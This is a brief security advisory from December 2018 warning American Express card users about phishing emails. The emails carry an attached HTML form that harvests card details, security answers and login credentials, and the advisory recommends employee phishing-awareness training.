Beware of American Express Emails With Attached Phishing Form
(Dec 29, 2018)
A phishing campaign has been discovered targeting American Express card users with emails purporting that there has been some security issues raised in relation to the user's card. The email states there is a security concern that requires addressing and contains an attached HTML form that requests various information. The information required in the form included: American Express card number, birth year, CVV, card ID number, expiration date, first elementary (primary) school name, mother's birth date and maiden name, online account credentials, and security pin. It also then requests the user enter in a new username and password to use. If the user enters this information into the forms and sends them off, they will be sent to the threat actor's remote host. After the remote host receives the data, it will redirect a user to a legitimate "americanexpress[.]com" page that says "thank you for your feedback."
Recommendation: All employees should be educated on the risks of phishing, specifically, how to identify such attempts and whom to contact if a phishing attack is identified. Emails that request that the recipient follow a link that then asks for credentials to be entered is often an indicator of a phishing attack. Especially regarding credit card companies, they will never prompt a user to enter in all their sensitive security information into HTML forms without direct verbal communication, as well, thus any attempt to have a user input all their credentials into an online form, is not recommended.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.